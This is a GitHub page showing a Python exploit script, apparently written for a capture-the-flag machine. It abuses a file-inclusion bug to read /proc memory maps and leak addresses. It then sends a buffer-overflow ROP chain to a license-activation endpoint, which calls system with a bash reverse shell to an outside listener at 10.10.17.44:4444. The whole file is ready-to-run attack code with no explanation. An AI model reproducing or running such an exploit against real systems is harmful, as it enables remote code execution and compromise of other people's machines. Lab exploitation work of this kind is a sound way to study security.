-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathsecond_exploit.py
executable file
·77 lines (57 loc) · 2.4 KB
/
second_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python3
import re
import requests
import struct
import sys
ip = '10.10.11.154'
p64 = lambda n: struct.pack('<Q', n)
def get_addresses(pid):
r = requests.get(f'http://{ip}/index.php?page=/proc/{pid}/maps', allow_redirects=False)
elf_base_addr = re.findall(r'(.*?)\-.*?/usr/bin/activate_license', r.text)[0]
glibc_base_addr = re.findall(r'(.*?)\-.*?/usr/lib/x86_64-linux-gnu/libc-2.31.so', r.text)[0]
stack_addr = re.findall(r'(.*?)\-.*?\[stack\]', r.text)[0]
return int(elf_base_addr, 16), int(glibc_base_addr, 16), int(stack_addr, 16)
def craft_payload(pid):
elf_address, glibc_address, stack_addr = get_addresses(pid)
pop_rax_ret = glibc_address + 0x3ee88
pop_rdi_ret = glibc_address + 0x26796
mov_qword_ptr_rax_rdi_ret = glibc_address + 0x8a0eb
system_addr = glibc_address + 0x48e50
writable_addr = elf_address + 0x04000
offset = 520
junk = b'A' * offset
payload = junk
payload += p64(pop_rdi_ret) + b'bash -c '
payload += p64(pop_rax_ret) + p64(writable_addr)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b"'bash -i"
payload += p64(pop_rax_ret) + p64(writable_addr + 8)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b' >& /dev'
payload += p64(pop_rax_ret) + p64(writable_addr + 16)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b'/tcp/10.'
payload += p64(pop_rax_ret) + p64(writable_addr + 24)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b'10.17.44'
payload += p64(pop_rax_ret) + p64(writable_addr + 32)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b'/4444 0>'
payload += p64(pop_rax_ret) + p64(writable_addr + 40)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + b"&1' \0"
payload += p64(pop_rax_ret) + p64(writable_addr + 48)
payload += p64(mov_qword_ptr_rax_rdi_ret)
payload += p64(pop_rdi_ret) + p64(writable_addr)
payload += p64(system_addr)
return {'licensefile': ('tmp_name', payload)}
def main():
if len(sys.argv) != 2:
print(f'[!] Usage: python3 {sys.argv[0]} <PID>')
return
pid = sys.argv[1]
requests.post(f'http://{ip}/activate_license.php',
files=craft_payload(pid))
print('[+] Sent payload. Check listener')
if __name__ == '__main__':
main()